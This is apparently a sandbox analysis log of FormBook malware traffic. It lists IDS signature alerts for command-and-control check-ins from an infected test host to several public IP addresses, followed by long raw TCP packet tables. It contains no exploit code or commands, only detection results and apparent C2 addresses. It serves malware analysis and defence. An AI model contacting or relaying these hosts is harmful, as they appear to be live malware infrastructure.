2024-10-08T15:39:48.799063+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50003 | 154.212.219.2 | 80 | TCP
2024-10-08T15:39:55.958587+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 133.130.35.90 | 80 | TCP
2024-10-08T15:39:58.521482+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 133.130.35.90 | 80 | TCP
2024-10-08T15:40:01.304936+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 133.130.35.90 | 80 | TCP
2024-10-08T15:40:03.615615+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50007 | 133.130.35.90 | 80 | TCP
2024-10-08T15:40:03.615615+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50007 | 133.130.35.90 | 80 | TCP
2024-10-08T15:40:09.260480+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50008 | 3.33.130.190 | 80 | TCP
2024-10-08T15:40:13.226134+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50009 | 3.33.130.190 | 80 | TCP
2024-10-08T15:40:15.751747+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50010 | 3.33.130.190 | 80 | TCP
2024-10-08T15:40:18.283403+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50011 | 3.33.130.190 | 80 | TCP
2024-10-08T15:40:18.283403+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50011 | 3.33.130.190 | 80 | TCP
2024-10-08T15:40:24.764708+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50012 | 172.191.244.62 | 80 | TCP
2024-10-08T15:40:27.311872+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50013 | 172.191.244.62 | 80 | TCP
2024-10-08T15:40:29.819752+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50014 | 172.191.244.62 | 80 | TCP
2024-10-08T15:40:32.455735+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50015 | 172.191.244.62 | 80 | TCP
2024-10-08T15:40:32.455735+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50015 | 172.191.244.62 | 80 | TCP
2024-10-08T15:40:38.306913+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50016 | 162.241.244.106 | 80 | TCP
2024-10-08T15:40:40.828582+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50017 | 162.241.244.106 | 80 | TCP
2024-10-08T15:40:43.543677+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50018 | 162.241.244.106 | 80 | TCP
2024-10-08T15:40:45.957320+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50019 | 162.241.244.106 | 80 | TCP
2024-10-08T15:40:45.957320+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50019 | 162.241.244.106 | 80 | TCP
2024-10-08T15:40:56.509717+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50020 | 199.59.243.227 | 80 | TCP
2024-10-08T15:40:59.095041+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50021 | 199.59.243.227 | 80 | TCP
2024-10-08T15:41:01.636055+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50022 | 199.59.243.227 | 80 | TCP
2024-10-08T15:41:04.179629+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50023 | 199.59.243.227 | 80 | TCP
2024-10-08T15:41:04.179629+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50023 | 199.59.243.227 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Oct 8, 2024 15:38:21.475048065 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475059986 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475073099 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475097895 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.475243092 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475296021 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.475903034 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475914001 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475925922 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.475959063 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:21.476167917 CEST804998067.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:21.476213932 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:22.301280975 CEST4998080192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.320065975 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.334474087 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.334554911 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.349253893 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.354178905 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946433067 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946451902 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946464062 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946553946 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.946588993 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946629047 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946636915 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.946640015 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.946682930 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.947055101 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947066069 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947081089 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947089911 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.947134018 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.949429035 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.951884031 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.951942921 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.951951981 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.951958895 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:23.952009916 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:23.952009916 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037367105 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037388086 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037398100 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037601948 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037615061 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037625074 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037692070 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037781954 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037791014 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037801027 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037831068 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037862062 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.037866116 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037877083 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.037919044 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.038687944 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038697004 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038707018 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038727045 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.038736105 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.038768053 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.039232016 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.039410114 CEST804998167.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:24.039486885 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:24.879319906 CEST4998180192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.914408922 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.919692039 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:25.919797897 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.930362940 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:25.935446978 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:25.935465097 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501810074 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501868010 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501885891 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501909971 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501928091 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.501961946 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.502152920 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502182007 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502198935 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502201080 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.502243042 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502258062 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.502286911 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.502365112 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.506917000 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.506933928 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.506947041 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.507038116 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.507047892 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.507107019 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588150024 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588191986 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588202000 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588257074 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588344097 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588355064 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588396072 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588557959 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588599920 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588610888 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.588610888 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588648081 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.588679075 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589236975 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589273930 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589282036 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.589293957 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589334965 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.589438915 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589449883 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.589490891 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:26.590096951 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.590172052 CEST804998267.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:26.590218067 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:27.441776037 CEST4998280192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.460439920 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.466097116 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:28.466216087 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.472740889 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:28.478013039 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065129995 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065192938 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065254927 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065289974 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065298080 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065357924 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065440893 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065500975 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065536976 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065566063 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065572023 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065598965 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065612078 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.065635920 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.065685987 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.070810080 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.070864916 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.070905924 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.070936918 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.113600016 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.153598070 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153635979 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153659105 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153680086 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153708935 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153832912 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153855085 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.153858900 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.153877974 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154059887 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.154215097 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154252052 CEST804998367.223.117.189192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:29.154297113 CEST4998380192.168.2.567.223.117.189
                                                                                                                  Oct 8, 2024 15:38:29.154738903 CEST804998367.223.117.189192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 8, 2024 15:38:29.154839039 CEST  80           49983      67.223.117.189   192.168.2.5
Oct 8, 2024 15:38:29.154872894 CEST  80           49983      67.223.117.189   192.168.2.5
Oct 8, 2024 15:38:29.154889107 CEST  49983        80         192.168.2.5      67.223.117.189
Oct 8, 2024 15:38:29.154907942 CEST  80           49983      67.223.117.189   192.168.2.5
Oct 8, 2024 15:38:29.154943943 CEST  80           49983      67.223.117.189   192.168.2.5
Oct 8, 2024 15:38:29.154956102 CEST  49983        80         192.168.2.5      67.223.117.189
Oct 8, 2024 15:38:29.155538082 CEST  80           49983      67.223.117.189   192.168.2.5
Oct 8, 2024 15:38:29.155594110 CEST  49983        80         192.168.2.5      67.223.117.189
Oct 8, 2024 15:38:29.157953024 CEST  49983        80         192.168.2.5      67.223.117.189
Oct 8, 2024 15:38:29.162904978 CEST  80           49983      67.223.117.189   192.168.2.5
Oct 8, 2024 15:38:42.261766911 CEST  49984        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:42.267031908 CEST  80           49984      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:42.267122984 CEST  49984        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:42.277132988 CEST  49984        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:42.282010078 CEST  80           49984      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:42.752520084 CEST  80           49984      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:42.752643108 CEST  49984        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:43.785542965 CEST  49984        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:43.790781975 CEST  80           49984      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:44.804389000 CEST  49985        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:44.809382915 CEST  80           49985      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:44.809495926 CEST  49985        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:44.820225954 CEST  49985        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:44.825136900 CEST  80           49985      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:45.280067921 CEST  80           49985      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:45.280121088 CEST  49985        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:46.335268021 CEST  49985        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:46.340416908 CEST  80           49985      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:47.364521980 CEST  49986        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:47.369848013 CEST  80           49986      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:47.369925976 CEST  49986        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:47.385597944 CEST  49986        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:47.390750885 CEST  80           49986      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:47.391345978 CEST  80           49986      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:47.853693008 CEST  80           49986      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:47.853763103 CEST  49986        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:48.899422884 CEST  49986        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:48.904699087 CEST  80           49986      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:49.913604021 CEST  49987        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:49.918545961 CEST  80           49987      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:49.918642998 CEST  49987        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:49.925474882 CEST  49987        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:49.930408001 CEST  80           49987      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:50.414079905 CEST  80           49987      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:50.414374113 CEST  80           49987      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:50.414469004 CEST  49987        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:50.417133093 CEST  49987        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:38:50.422090054 CEST  80           49987      3.33.130.190     192.168.2.5
Oct 8, 2024 15:38:55.961447001 CEST  49988        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:55.966387033 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:55.966449976 CEST  49988        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:55.979124069 CEST  49988        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:55.984055042 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.865907907 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.865984917 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.865997076 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.866009951 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.866055965 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.866069078 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.866079092 CEST  80           49988      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:56.866137028 CEST  49988        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:56.866137028 CEST  49988        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:56.866137028 CEST  49988        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:57.488601923 CEST  49988        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:58.507119894 CEST  49989        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:58.512202024 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:58.515175104 CEST  49989        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:58.526508093 CEST  49989        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:58.531759024 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.366974115 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.366990089 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.367002964 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.367012978 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.367024899 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.367036104 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.367049932 CEST  80           49989      183.181.83.131   192.168.2.5
Oct 8, 2024 15:38:59.367057085 CEST  49989        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:59.367147923 CEST  49989        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:38:59.367147923 CEST  49989        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:00.035681963 CEST  49989        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:01.054754972 CEST  49990        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:01.441916943 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:01.442001104 CEST  49990        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:01.454221010 CEST  49990        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:01.459429026 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:01.459469080 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344259024 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344299078 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344307899 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344319105 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344330072 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344341993 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344376087 CEST  49990        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:02.344573021 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344584942 CEST  80           49990      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:02.344599009 CEST  49990        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:02.346623898 CEST  49990        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:02.959314108 CEST  49990        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:03.977401018 CEST  49991        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:03.982573986 CEST  80           49991      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:03.982681990 CEST  49991        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:03.989612103 CEST  49991        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:03.995420933 CEST  80           49991      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:04.846374035 CEST  80           49991      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:04.846435070 CEST  80           49991      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:04.853667021 CEST  49991        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:04.873795986 CEST  49991        80         192.168.2.5      183.181.83.131
Oct 8, 2024 15:39:04.878801107 CEST  80           49991      183.181.83.131   192.168.2.5
Oct 8, 2024 15:39:10.063410044 CEST  49992        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:10.068360090 CEST  80           49992      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:10.068648100 CEST  49992        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:10.079406977 CEST  49992        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:10.084676981 CEST  80           49992      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:11.019114017 CEST  80           49992      38.47.232.196    192.168.2.5
